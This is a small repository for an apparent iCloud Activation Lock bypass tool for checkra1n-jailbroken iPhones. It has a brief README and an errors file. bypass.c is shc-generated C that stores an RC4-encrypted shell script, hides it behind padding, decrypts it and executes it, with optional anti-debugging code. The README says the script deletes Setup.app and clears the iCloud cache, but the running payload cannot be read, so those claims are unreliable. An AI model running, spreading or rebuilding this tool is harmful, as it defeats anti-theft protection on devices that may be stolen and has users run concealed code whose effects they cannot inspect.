├── ERRORS.md
├── README.md
└── bypass.c


/ERRORS.md:
--------------------------------------------------------------------------------
 1 | # Common Errors
 2 | 
 3 | ## 1st Mistake: Invalid IOS version.
 4 | Uh huh, your home button is not working?
 5 | well, you used lower than ios 12.0.0...!
 6 | you gotta HARD reset.
 7 | 
 8 | 
 9 | # NO MORE ERRORS!
10 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # iCloud Bypass!
 2 | A iCloud Bypass app!
 3 | ## How to use?
 4 | if you are on mac, you will need to compile using `gcc bypass.c -o bypass` and run `./bypass` then your done! make sure you connect ur idevice or it will
 5 | not work!
 6 | ok so... now on linux?
 7 | ## Linux
 8 | simply download the latest release and `./bypassr` and your done! 
 9 | it's completely made in C
10 | ## Windows
11 | hey hey, its a shell script! not a c program ok. its made in shell i compiled it to C
12 | even if you turn it into a EXE nd run it, it will not work. it will simply fail to bypass, as you need to JB with checkra1n.
13 | 
14 | 
15 | ## Support
16 | only works on checkra1n and any other JB that has iproxy SSH support.
17 | recommended to use checkra1n
18 | 
19 | ## How it works?
20 | Simply works by clearing the old icloud user cache and deleting setup.app.
21 | and respringing the device, killing backboardd
22 | 
23 | ## MY HOME BUTTON IS BROKEN!
24 | read ERRORS.md
25 | and reset to fix this issue.
26 | 
27 | ## Dosen't Work!
28 | that's your fault dumbo.
29 | our method is completely simple.
30 | 
31 | ## Shell code?
32 | in late 2021.
33 | 
34 | ## Credits
35 | Me =)
36 | 


--------------------------------------------------------------------------------
/bypass.c:
--------------------------------------------------------------------------------
  1 | #if 0
  2 | #endif
  3 | 
  4 | static  char data [] = 
  5 | #define      shll_z	10
  6 | #define      shll	((&data[0]))
  7 | 	"\334\363\226\142\144\271\105\370\246\366\333"
  8 | #define      date_z	1
  9 | #define      date	((&data[11]))
 10 | 	"\253"
 11 | #define      inlo_z	3
 12 | #define      inlo	((&data[12]))
 13 | 	"\277\047\056"
 14 | #define      chk2_z	19
 15 | #define      chk2	((&data[15]))
 16 | 	"\023\142\361\015\346\062\214\006\225\234\054\044\210\054\155\053"
 17 | 	"\001\202\172\345\263"
 18 | #define      xecc_z	15
 19 | #define      xecc	((&data[39]))
 20 | 	"\270\350\056\346\315\342\263\020\111\057\355\302\120\020\033\101"
 21 | 	"\206\376"
 22 | #define      rlax_z	1
 23 | #define      rlax	((&data[54]))
 24 | 	"\146"
 25 | #define      lsto_z	1
 26 | #define      lsto	((&data[55]))
 27 | 	"\005"
 28 | #define      tst2_z	19
 29 | #define      tst2	((&data[56]))
 30 | 	"\007\044\332\265\016\051\003\000\073\233\005\355\055\026\174\072"
 31 | 	"\273\300\141\327\114\337"
 32 | #define      tst1_z	22
 33 | #define      tst1	((&data[78]))
 34 | 	"\307\211\202\124\343\015\201\171\222\222\150\272\274\105\334\367"
 35 | 	"\060\147\126\164\110\143"
 36 | #define      opts_z	1
 37 | #define      opts	((&data[100]))
 38 | 	"\104"
 39 | #define      chk1_z	22
 40 | #define      chk1	((&data[104]))
 41 | 	"\303\032\047\060\107\344\034\051\164\206\144\205\023\212\271\206"
 42 | 	"\017\327\076\107\056\073\221\323\377\166"
 43 | #define      msg2_z	19
 44 | #define      msg2	((&data[127]))
 45 | 	"\114\121\136\163\056\117\343\077\346\304\114\100\216\361\346\212"
 46 | 	"\077\353\244\041\002\326"
 47 | #define      text_z	518
 48 | #define      text	((&data[195]))
 49 | 	"\043\364\047\003\377\320\332\113\257\077\163\271\354\121\376\175"
 50 | 	"\354\100\101\007\147\270\157\201\137\221\204\066\144\337\023\210"
 51 | 	"\323\073\213\322\013\145\036\273\245\222\165\221\344\164\041\042"
 52 | 	"\103\333\154\007\321\356\264\046\216\167\213\103\240\372\061\051"
 53 | 	"\210\210\046\012\042\157\307\266\220\353\251\337\150\355\377\302"
 54 | 	"\015\305\155\047\200\206\343\307\307\376\224\350\135\256\207\127"
 55 | 	"\146\114\034\143\226\111\136\253\262\201\131\135\265\021\065\075"
 56 | 	"\076\304\265\366\113\372\335\267\026\237\070\355\155\324\336\022"
 57 | 	"\034\120\302\005\332\213\036\231\030\317\015\044\263\076\013\347"
 58 | 	"\235\065\317\235\112\004\035\214\306\021\066\135\206\232\365\023"
 59 | 	"\140\155\021\054\122\215\006\370\151\052\052\011\001\233\117\050"
 60 | 	"\100\351\345\270\330\072\335\122\334\306\044\347\034\254\273\346"
 61 | 	"\343\076\146\314\115\276\031\050\255\357\061\242\126\314\167\062"
 62 | 	"\130\107\374\145\350\243\145\034\201\202\115\277\114\056\034\110"
 63 | 	"\172\122\304\062\134\346\365\115\077\003\223\251\250\112\134\045"
 64 | 	"\303\077\071\317\217\343\202\016\145\235\275\164\205\041\325\257"
 65 | 	"\043\124\272\305\342\021\035\126\162\011\324\061\075\224\151\323"
 66 | 	"\110\071\322\110\015\265\120\170\241\004\241\240\161\047\336\055"
 67 | 	"\221\110\024\053\060\072\307\151\330\354\356\031\255\161\327\013"
 68 | 	"\032\003\023\024\041\302\142\151\210\043\137\062\143\236\075\112"
 69 | 	"\130\237\374\333\076\117\041\015\026\171\044\341\215\065\051\032"
 70 | 	"\346\333\147\177\377\054\157\217\255\214\002\375\371\060\246\353"
 71 | 	"\107\061\336\217\116\071\010\335\245\013\004\164\212\055\117\266"
 72 | 	"\112\054\226\053\276\144\073\350\026\215\134\230\262\052\302\174"
 73 | 	"\067\376\334\157\225\102\140\031\312\311\044\235\274\063\201\014"
 74 | 	"\155\302\256\025\133\243\216\026\305\130\177\375\250\115\041\334"
 75 | 	"\212\352\303\361\233\317\135\316\214\102\226\271\064\356\061\122"
 76 | 	"\326\216\057\131\142\076\223\042\271\141\262\251\152\246\225\027"
 77 | 	"\336\275\137\362\343\307\377\316\120\007\362\113\020\352\306\047"
 78 | 	"\105\177\271\202\114\010\334\365\215\046\063\005\254\174\366\207"
 79 | 	"\363\373\215\173\155\210\370\362\016\364\100\252\117\327\253\043"
 80 | 	"\054\257\213\030\357\301\250\166\104\071\325\243\357\016\061\252"
 81 | 	"\271\311\037\273\070\136\070\261\132\206\353\054\215\000\037\360"
 82 | 	"\014\162\052\101\122\261\034\140\132\173\357\341\076\171\247\170"
 83 | 	"\273\231\240\057\012\247\266\054\016\260\026\261\016\111\201\363"
 84 | 	"\271\154\230\006\017\321\264\120\330\033\010\110\235\150\331\041"
 85 | 	"\236\076\000\261\306\324\355\121\247\370\267\306\264\134\130\052"
 86 | 	"\356\075\236\375\016\123\115\347\157\126\060\014\276\011\055\135"
 87 | 	"\110\056\017\016\003\374\140\252\365\027\161\252\164\312\324\142"
 88 | 	"\007\163\137\026\306\254\375\065\003\055\102\301\067\160\037\177"
 89 | 	"\237\056\216\242\052\356\115\040\005\276\312\171\210\236\333\220"
 90 | 	"\022\073\246\330\350\244\016\353\321\120\255\011\300\314\211\137"
 91 | 	"\373\027\002\046"
 92 | #define      pswd_z	256
 93 | #define      pswd	((&data[845]))
 94 | 	"\013\015\021\205\226\260\141\046\302\234\315\232\205\161\250\160"
 95 | 	"\103\371\036\114\121\241\010\143\046\046\117\036\036\021\076\364"
 96 | 	"\055\120\170\064\062\240\210\167\276\264\076\363\203\202\124\034"
 97 | 	"\337\372\371\061\233\001\224\302\050\344\340\106\365\036\072\043"
 98 | 	"\157\263\130\242\124\340\031\023\225\127\006\030\332\132\064\272"
 99 | 	"\125\055\353\361\057\200\263\127\144\223\236\131\262\331\175\041"
100 | 	"\215\325\304\341\265\336\364\112\065\373\142\020\126\227\312\253"
101 | 	"\304\266\234\364\066\117\114\232\343\352\363\226\304\160\270\121"
102 | 	"\105\174\063\373\132\050\106\220\043\250\241\171\100\153\045\004"
103 | 	"\041\301\371\127\021\105\362\364\057\346\213\364\127\103\105\235"
104 | 	"\277\170\230\032\240\336\252\304\207\114\075\307\267\142\314\331"
105 | 	"\044\305\061\065\012\043\052\072\012\265\056\141\371\164\376\271"
106 | 	"\355\226\323\215\165\176\121\374\312\217\304\202\362\221\134\026"
107 | 	"\126\215\114\141\261\166\234\273\054\313\035\046\077\033\337\055"
108 | 	"\261\263\272\047\062\014\044\374\234\350\177\216\171\333\245\320"
109 | 	"\151\361\062\033\150\316\327\225\232\364\273\332\017\233\007\301"
110 | 	"\116\302\351\200\316\015\175\152\365\375\371\157\331\236\100\102"
111 | 	"\217\162\136\367\271\352\325\031\345\355\033\014\362\153\122\376"
112 | 	"\171\143\204\017\023"
113 | #define      msg1_z	65
114 | #define      msg1	((&data[1121]))
115 | 	"\202\003\161\327\062\114\172\241\157\156\063\041\326\366\010\140"
116 | 	"\354\055\326\215\347\000\035\325\365\274\135\154\165\164\174\240"
117 | 	"\123\200\165\233\004\022\014\264\376\254\314\241\233\247\234\203"
118 | 	"\201\325\327\146\202\036\115\022\211\050\061\054\142\355\047\146"
119 | 	"\362\165\175\055\007\164\032\170\267\023\226\004\315\201\331\347"
120 | 	"\147\306"/* End of data[] */;
121 | #define      hide_z	4096
122 | #define SETUID 0	/* Define as 1 to call setuid(0) at start of script */
123 | #define DEBUGEXEC	0	/* Define as 1 to debug execvp calls */
124 | #define TRACEABLE	1	/* Define as 1 to enable ptrace the executable */
125 | #define HARDENING	0	/* Define as 1 to disable ptrace/dump the executable */
126 | #define BUSYBOXON	0	/* Define as 1 to enable work with busybox */
127 | 
128 | #if HARDENING
129 | static const char * shc_x[] = {
130 | "/*",
131 | " * Copyright 2019 - Intika <intika@librefox.org>",
132 | " * Replace ******** with secret read from fd 21",
133 | " * Also change arguments location of sub commands (sh script commands)",
134 | " * gcc -Wall -fpic -shared -o shc_secret.so shc_secret.c -ldl",
135 | " */",
136 | "",
137 | "#define _GNU_SOURCE /* needed to get RTLD_NEXT defined in dlfcn.h */",
138 | "#define PLACEHOLDER \"********\"",
139 | "#include <dlfcn.h>",
140 | "#include <stdlib.h>",
141 | "#include <string.h>",
142 | "#include <unistd.h>",
143 | "#include <stdio.h>",
144 | "#include <signal.h>",
145 | "",
146 | "static char secret[128000]; //max size",
147 | "typedef int (*pfi)(int, char **, char **);",
148 | "static pfi real_main;",
149 | "",
150 | "// copy argv to new location",
151 | "char **copyargs(int argc, char** argv){",
152 | "    char **newargv = malloc((argc+1)*sizeof(*argv));",
153 | "    char *from,*to;",
154 | "    int i,len;",
155 | "",
156 | "    for(i = 0; i<argc; i++){",
157 | "        from = argv[i];",
158 | "        len = strlen(from)+1;",
159 | "        to = malloc(len);",
160 | "        memcpy(to,from,len);",
161 | "        // zap old argv space",
162 | "        memset(from,'\\0',len);",
163 | "        newargv[i] = to;",
164 | "        argv[i] = 0;",
165 | "    }",
166 | "    newargv[argc] = 0;",
167 | "    return newargv;",
168 | "}",
169 | "",
170 | "static int mymain(int argc, char** argv, char** env) {",
171 | "    //fprintf(stderr, \"Inject main argc = %d\\n\", argc);",
172 | "    return real_main(argc, copyargs(argc,argv), env);",
173 | "}",
174 | "",
175 | "int __libc_start_main(int (*main) (int, char**, char**),",
176 | "                      int argc,",
177 | "                      char **argv,",
178 | "                      void (*init) (void),",
179 | "                      void (*fini)(void),",
180 | "                      void (*rtld_fini)(void),",
181 | "                      void (*stack_end)){",
182 | "    static int (*real___libc_start_main)() = NULL;",
183 | "    int n;",
184 | "",
185 | "    if (!real___libc_start_main) {",
186 | "        real___libc_start_main = dlsym(RTLD_NEXT, \"__libc_start_main\");",
187 | "        if (!real___libc_start_main) abort();",
188 | "    }",
189 | "",
190 | "    n = read(21, secret, sizeof(secret));",
191 | "    if (n > 0) {",
192 | "      int i;",
193 | "",
194 | "    if (secret[n - 1] == '\\n') secret[--n] = '\\0';",
195 | "    for (i = 1; i < argc; i++)",
196 | "        if (strcmp(argv[i], PLACEHOLDER) == 0)",
197 | "          argv[i] = secret;",
198 | "    }",
199 | "",
200 | "    real_main = main;",
201 | "",
202 | "    return real___libc_start_main(mymain, argc, argv, init, fini, rtld_fini, stack_end);",
203 | "}",
204 | "",
205 | 0};
206 | #endif /* HARDENING */
207 | 
208 | /* rtc.c */
209 | 
210 | #include <sys/stat.h>
211 | #include <sys/types.h>
212 | 
213 | #include <errno.h>
214 | #include <stdio.h>
215 | #include <stdlib.h>
216 | #include <string.h>
217 | #include <time.h>
218 | #include <unistd.h>
219 | 
220 | /* 'Alleged RC4' */
221 | 
222 | static unsigned char stte[256], indx, jndx, kndx;
223 | 
224 | /*
225 |  * Reset arc4 stte. 
226 |  */
227 | void stte_0(void)
228 | {
229 | 	indx = jndx = kndx = 0;
230 | 	do {
231 | 		stte[indx] = indx;
232 | 	} while (++indx);
233 | }
234 | 
235 | /*
236 |  * Set key. Can be used more than once. 
237 |  */
238 | void key(void * str, int len)
239 | {
240 | 	unsigned char tmp, * ptr = (unsigned char *)str;
241 | 	while (len > 0) {
242 | 		do {
243 | 			tmp = stte[indx];
244 | 			kndx += tmp;
245 | 			kndx += ptr[(int)indx % len];
246 | 			stte[indx] = stte[kndx];
247 | 			stte[kndx] = tmp;
248 | 		} while (++indx);
249 | 		ptr += 256;
250 | 		len -= 256;
251 | 	}
252 | }
253 | 
254 | /*
255 |  * Crypt data. 
256 |  */
257 | void arc4(void * str, int len)
258 | {
259 | 	unsigned char tmp, * ptr = (unsigned char *)str;
260 | 	while (len > 0) {
261 | 		indx++;
262 | 		tmp = stte[indx];
263 | 		jndx += tmp;
264 | 		stte[indx] = stte[jndx];
265 | 		stte[jndx] = tmp;
266 | 		tmp += stte[indx];
267 | 		*ptr ^= stte[tmp];
268 | 		ptr++;
269 | 		len--;
270 | 	}
271 | }
272 | 
273 | /* End of ARC4 */
274 | 
275 | #if HARDENING
276 | 
277 | #include <sys/ptrace.h>
278 | #include <sys/wait.h>
279 | #include <signal.h>
280 | #include <sys/prctl.h>
281 | #define PR_SET_PTRACER 0x59616d61
282 | 
283 | /* Seccomp Sandboxing Init */
284 | #include <stdlib.h>
285 | #include <stdio.h>
286 | #include <stddef.h>
287 | #include <string.h>
288 | #include <unistd.h>
289 | #include <errno.h>
290 | 
291 | #include <sys/types.h>
292 | #include <sys/prctl.h>
293 | #include <sys/syscall.h>
294 | #include <sys/socket.h>
295 | 
296 | #include <linux/filter.h>
297 | #include <linux/seccomp.h>
298 | #include <linux/audit.h>
299 | 
300 | #define ArchField offsetof(struct seccomp_data, arch)
301 | 
302 | #define Allow(syscall) \
303 |     BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, SYS_##syscall, 0, 1), \
304 |     BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)
305 | 
306 | struct sock_filter filter[] = {
307 |     /* validate arch */
308 |     BPF_STMT(BPF_LD+BPF_W+BPF_ABS, ArchField),
309 |     BPF_JUMP( BPF_JMP+BPF_JEQ+BPF_K, AUDIT_ARCH_X86_64, 1, 0),
310 |     BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
311 | 
312 |     /* load syscall */
313 |     BPF_STMT(BPF_LD+BPF_W+BPF_ABS, offsetof(struct seccomp_data, nr)),
314 | 
315 |     /* list of allowed syscalls */
316 |     Allow(exit_group),  /* exits a process */
317 |     Allow(brk),         /* for malloc(), inside libc */
318 |     Allow(mmap),        /* also for malloc() */
319 |     Allow(munmap),      /* for free(), inside libc */
320 | 
321 |     /* and if we don't match above, die */
322 |     BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_KILL),
323 | };
324 | struct sock_fprog filterprog = {
325 |     .len = sizeof(filter)/sizeof(filter[0]),
326 |     .filter = filter
327 | };
328 | 
329 | /* Seccomp Sandboxing - Set up the restricted environment */
330 | void seccomp_hardening() {
331 |     if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)) {
332 |         perror("Could not start seccomp:");
333 |         exit(1);
334 |     }
335 |     if (prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &filterprog) == -1) {
336 |         perror("Could not start seccomp:");
337 |         exit(1);
338 |     }
339 | } 
340 | /* End Seccomp Sandboxing Init */
341 | 
342 | void shc_x_file() {
343 |     FILE *fp;
344 |     int line = 0;
345 | 
346 |     if ((fp = fopen("/tmp/shc_x.c", "w")) == NULL ) {exit(1); exit(1);}
347 |     for (line = 0; shc_x[line]; line++)	fprintf(fp, "%s\n", shc_x[line]);
348 |     fflush(fp);fclose(fp);
349 | }
350 | 
351 | int make() {
352 | 	char * cc, * cflags, * ldflags;
353 |     char cmd[4096];
354 | 
355 | 	cc = getenv("CC");
356 | 	if (!cc) cc = "cc";
357 | 
358 | 	sprintf(cmd, "%s %s -o %s %s", cc, "-Wall -fpic -shared", "/tmp/shc_x.so", "/tmp/shc_x.c -ldl");
359 | 	if (system(cmd)) {remove("/tmp/shc_x.c"); return -1;}
360 | 	remove("/tmp/shc_x.c"); return 0;
361 | }
362 | 
363 | void arc4_hardrun(void * str, int len) {
364 |     //Decode locally
365 |     char tmp2[len];
366 |     char tmp3[len+1024];
367 |     memcpy(tmp2, str, len);
368 | 
369 | 	unsigned char tmp, * ptr = (unsigned char *)tmp2;
370 |     int lentmp = len;
371 |     int pid, status;
372 |     pid = fork();
373 | 
374 |     shc_x_file();
375 |     if (make()) {exit(1);}
376 | 
377 |     setenv("LD_PRELOAD","/tmp/shc_x.so",1);
378 | 
379 |     if(pid==0) {
380 | 
381 |         //Start tracing to protect from dump & trace
382 |         if (ptrace(PTRACE_TRACEME, 0, 0, 0) < 0) {
383 |             kill(getpid(), SIGKILL);
384 |             _exit(1);
385 |         }
386 | 
387 |         //Decode Bash
388 |         while (len > 0) {
389 |             indx++;
390 |             tmp = stte[indx];
391 |             jndx += tmp;
392 |             stte[indx] = stte[jndx];
393 |             stte[jndx] = tmp;
394 |             tmp += stte[indx];
395 |             *ptr ^= stte[tmp];
396 |             ptr++;
397 |             len--;
398 |         }
399 | 
400 |         //Do the magic
401 |         sprintf(tmp3, "%s %s", "'********' 21<<<", tmp2);
402 | 
403 |         //Exec bash script //fork execl with 'sh -c'
404 |         system(tmp2);
405 | 
406 |         //Empty script variable
407 |         memcpy(tmp2, str, lentmp);
408 | 
409 |         //Clean temp
410 |         remove("/tmp/shc_x.so");
411 | 
412 |         //Sinal to detach ptrace
413 |         ptrace(PTRACE_DETACH, 0, 0, 0);
414 |         exit(0);
415 |     }
416 |     else {wait(&status);}
417 | 
418 |     /* Seccomp Sandboxing - Start */
419 |     seccomp_hardening();
420 | 
421 |     exit(0);
422 | }
423 | #endif /* HARDENING */
424 | 
425 | /*
426 |  * Key with file invariants. 
427 |  */
428 | int key_with_file(char * file)
429 | {
430 | 	struct stat statf[1];
431 | 	struct stat control[1];
432 | 
433 | 	if (stat(file, statf) < 0)
434 | 		return -1;
435 | 
436 | 	/* Turn on stable fields */
437 | 	memset(control, 0, sizeof(control));
438 | 	control->st_ino = statf->st_ino;
439 | 	control->st_dev = statf->st_dev;
440 | 	control->st_rdev = statf->st_rdev;
441 | 	control->st_uid = statf->st_uid;
442 | 	control->st_gid = statf->st_gid;
443 | 	control->st_size = statf->st_size;
444 | 	control->st_mtime = statf->st_mtime;
445 | 	control->st_ctime = statf->st_ctime;
446 | 	key(control, sizeof(control));
447 | 	return 0;
448 | }
449 | 
450 | #if DEBUGEXEC
451 | void debugexec(char * sh11, int argc, char ** argv)
452 | {
453 | 	int i;
454 | 	fprintf(stderr, "shll=%s\n", sh11 ? sh11 : "<null>");
455 | 	fprintf(stderr, "argc=%d\n", argc);
456 | 	if (!argv) {
457 | 		fprintf(stderr, "argv=<null>\n");
458 | 	} else { 
459 | 		for (i = 0; i <= argc ; i++)
460 | 			fprintf(stderr, "argv[%d]=%.60s\n", i, argv[i] ? argv[i] : "<null>");
461 | 	}
462 | }
463 | #endif /* DEBUGEXEC */
464 | 
465 | void rmarg(char ** argv, char * arg)
466 | {
467 | 	for (; argv && *argv && *argv != arg; argv++);
468 | 	for (; argv && *argv; argv++)
469 | 		*argv = argv[1];
470 | }
471 | 
472 | void chkenv_end(void);
473 | 
474 | int chkenv(int argc)
475 | {
476 | 	char buff[512];
477 | 	unsigned long mask, m;
478 | 	int l, a, c;
479 | 	char * string;
480 | 	extern char ** environ;
481 | 
482 | 	mask = (unsigned long)getpid();
483 | 	stte_0();
484 | 	 key(&chkenv, (void*)&chkenv_end - (void*)&chkenv);
485 | 	 key(&data, sizeof(data));
486 | 	 key(&mask, sizeof(mask));
487 | 	arc4(&mask, sizeof(mask));
488 | 	sprintf(buff, "x%lx", mask);
489 | 	string = getenv(buff);
490 | #if DEBUGEXEC
491 | 	fprintf(stderr, "getenv(%s)=%s\n", buff, string ? string : "<null>");
492 | #endif
493 | 	l = strlen(buff);
494 | 	if (!string) {
495 | 		/* 1st */
496 | 		sprintf(&buff[l], "=%lu %d", mask, argc);
497 | 		putenv(strdup(buff));
498 | 		return 0;
499 | 	}
500 | 	c = sscanf(string, "%lu %d%c", &m, &a, buff);
501 | 	if (c == 2 && m == mask) {
502 | 		/* 3rd */
503 | 		rmarg(environ, &string[-l - 1]);
504 | 		return 1 + (argc - a);
505 | 	}
506 | 	return -1;
507 | }
508 | 
509 | void chkenv_end(void){}
510 | 
511 | #if HARDENING
512 | 
513 | static void gets_process_name(const pid_t pid, char * name) {
514 | 	char procfile[BUFSIZ];
515 | 	sprintf(procfile, "/proc/%d/cmdline", pid);
516 | 	FILE* f = fopen(procfile, "r");
517 | 	if (f) {
518 | 		size_t size;
519 | 		size = fread(name, sizeof (char), sizeof (procfile), f);
520 | 		if (size > 0) {
521 | 			if ('\n' == name[size - 1])
522 | 				name[size - 1] = '\0';
523 | 		}
524 | 		fclose(f);
525 | 	}
526 | }
527 | 
528 | void hardening() {
529 |     prctl(PR_SET_DUMPABLE, 0);
530 |     prctl(PR_SET_PTRACER, -1);
531 | 
532 |     int pid = getppid();
533 |     char name[256] = {0};
534 |     gets_process_name(pid, name);
535 | 
536 |     if (   (strcmp(name, "bash") != 0) 
537 |         && (strcmp(name, "/bin/bash") != 0) 
538 |         && (strcmp(name, "sh") != 0) 
539 |         && (strcmp(name, "/bin/sh") != 0) 
540 |         && (strcmp(name, "sudo") != 0) 
541 |         && (strcmp(name, "/bin/sudo") != 0) 
542 |         && (strcmp(name, "/usr/bin/sudo") != 0)
543 |         && (strcmp(name, "gksudo") != 0) 
544 |         && (strcmp(name, "/bin/gksudo") != 0) 
545 |         && (strcmp(name, "/usr/bin/gksudo") != 0) 
546 |         && (strcmp(name, "kdesu") != 0) 
547 |         && (strcmp(name, "/bin/kdesu") != 0) 
548 |         && (strcmp(name, "/usr/bin/kdesu") != 0) 
549 |        )
550 |     {
551 |         printf("Operation not permitted\n");
552 |         kill(getpid(), SIGKILL);
553 |         exit(1);
554 |     }
555 | }
556 | 
557 | #endif /* HARDENING */
558 | 
559 | #if !TRACEABLE
560 | 
561 | #define _LINUX_SOURCE_COMPAT
562 | #include <sys/ptrace.h>
563 | #include <sys/types.h>
564 | #include <sys/wait.h>
565 | #include <fcntl.h>
566 | #include <signal.h>
567 | #include <stdio.h>
568 | #include <unistd.h>
569 | 
570 | #if !defined(PT_ATTACHEXC) /* New replacement for PT_ATTACH */
571 |    #if !defined(PTRACE_ATTACH) && defined(PT_ATTACH)
572 |        #define PT_ATTACHEXC	PT_ATTACH
573 |    #elif defined(PTRACE_ATTACH)
574 |        #define PT_ATTACHEXC PTRACE_ATTACH
575 |    #endif
576 | #endif
577 | 
578 | void untraceable(char * argv0)
579 | {
580 | 	char proc[80];
581 | 	int pid, mine;
582 | 
583 | 	switch(pid = fork()) {
584 | 	case  0:
585 | 		pid = getppid();
586 | 		/* For problematic SunOS ptrace */
587 | #if defined(__FreeBSD__)
588 | 		sprintf(proc, "/proc/%d/mem", (int)pid);
589 | #else
590 | 		sprintf(proc, "/proc/%d/as",  (int)pid);
591 | #endif
592 | 		close(0);
593 | 		mine = !open(proc, O_RDWR|O_EXCL);
594 | 		if (!mine && errno != EBUSY)
595 | 			mine = !ptrace(PT_ATTACHEXC, pid, 0, 0);
596 | 		if (mine) {
597 | 			kill(pid, SIGCONT);
598 | 		} else {
599 | 			perror(argv0);
600 | 			kill(pid, SIGKILL);
601 | 		}
602 | 		_exit(mine);
603 | 	case -1:
604 | 		break;
605 | 	default:
606 | 		if (pid == waitpid(pid, 0, 0))
607 | 			return;
608 | 	}
609 | 	perror(argv0);
610 | 	_exit(1);
611 | }
612 | #endif /* !TRACEABLE */
613 | 
614 | char * xsh(int argc, char ** argv)
615 | {
616 | 	char * scrpt;
617 | 	int ret, i, j;
618 | 	char ** varg;
619 | 	char * me = argv[0];
620 | 	if (me == NULL) { me = getenv("_"); }
621 | 	if (me == 0) { fprintf(stderr, "E: neither argv[0] nor $_ works."); exit(1); }
622 | 
623 | 	ret = chkenv(argc);
624 | 	stte_0();
625 | 	 key(pswd, pswd_z);
626 | 	arc4(msg1, msg1_z);
627 | 	arc4(date, date_z);
628 | 	if (date[0] && (atoll(date)<time(NULL)))
629 | 		return msg1;
630 | 	arc4(shll, shll_z);
631 | 	arc4(inlo, inlo_z);
632 | 	arc4(xecc, xecc_z);
633 | 	arc4(lsto, lsto_z);
634 | 	arc4(tst1, tst1_z);
635 | 	 key(tst1, tst1_z);
636 | 	arc4(chk1, chk1_z);
637 | 	if ((chk1_z != tst1_z) || memcmp(tst1, chk1, tst1_z))
638 | 		return tst1;
639 | 	arc4(msg2, msg2_z);
640 | 	if (ret < 0)
641 | 		return msg2;
642 | 	varg = (char **)calloc(argc + 10, sizeof(char *));
643 | 	if (!varg)
644 | 		return 0;
645 | 	if (ret) {
646 | 		arc4(rlax, rlax_z);
647 | 		if (!rlax[0] && key_with_file(shll))
648 | 			return shll;
649 | 		arc4(opts, opts_z);
650 | #if HARDENING
651 | 	    arc4_hardrun(text, text_z);
652 | 	    exit(0);
653 |        /* Seccomp Sandboxing - Start */
654 |        seccomp_hardening();
655 | #endif
656 | 		arc4(text, text_z);
657 | 		arc4(tst2, tst2_z);
658 | 		 key(tst2, tst2_z);
659 | 		arc4(chk2, chk2_z);
660 | 		if ((chk2_z != tst2_z) || memcmp(tst2, chk2, tst2_z))
661 | 			return tst2;
662 | 		/* Prepend hide_z spaces to script text to hide it. */
663 | 		scrpt = malloc(hide_z + text_z);
664 | 		if (!scrpt)
665 | 			return 0;
666 | 		memset(scrpt, (int) ' ', hide_z);
667 | 		memcpy(&scrpt[hide_z], text, text_z);
668 | 	} else {			/* Reexecute */
669 | 		if (*xecc) {
670 | 			scrpt = malloc(512);
671 | 			if (!scrpt)
672 | 				return 0;
673 | 			sprintf(scrpt, xecc, me);
674 | 		} else {
675 | 			scrpt = me;
676 | 		}
677 | 	}
678 | 	j = 0;
679 | #if BUSYBOXON
680 | 	varg[j++] = "busybox";
681 | 	varg[j++] = "sh";
682 | #else
683 | 	varg[j++] = argv[0];		/* My own name at execution */
684 | #endif
685 | 	if (ret && *opts)
686 | 		varg[j++] = opts;	/* Options on 1st line of code */
687 | 	if (*inlo)
688 | 		varg[j++] = inlo;	/* Option introducing inline code */
689 | 	varg[j++] = scrpt;		/* The script itself */
690 | 	if (*lsto)
691 | 		varg[j++] = lsto;	/* Option meaning last option */
692 | 	i = (ret > 1) ? ret : 0;	/* Args numbering correction */
693 | 	while (i < argc)
694 | 		varg[j++] = argv[i++];	/* Main run-time arguments */
695 | 	varg[j] = 0;			/* NULL terminated array */
696 | #if DEBUGEXEC
697 | 	debugexec(shll, j, varg);
698 | #endif
699 | 	execvp(shll, varg);
700 | 	return shll;
701 | }
702 | 
703 | int main(int argc, char ** argv)
704 | {
705 | #if SETUID
706 |    setuid(0);
707 | #endif
708 | #if DEBUGEXEC
709 | 	debugexec("main", argc, argv);
710 | #endif
711 | #if HARDENING
712 | 	hardening();
713 | #endif
714 | #if !TRACEABLE
715 | 	untraceable(argv[0]);
716 | #endif
717 | 	argv[1] = xsh(argc, argv);
718 | 	fprintf(stderr, "%s%s%s: %s\n", argv[0],
719 | 		errno ? ": " : "",
720 | 		errno ? strerror(errno) : "",
721 | 		argv[1] ? argv[1] : "<null>"
722 | 	);
723 | 	return 1;
724 | }
725 | 


--------------------------------------------------------------------------------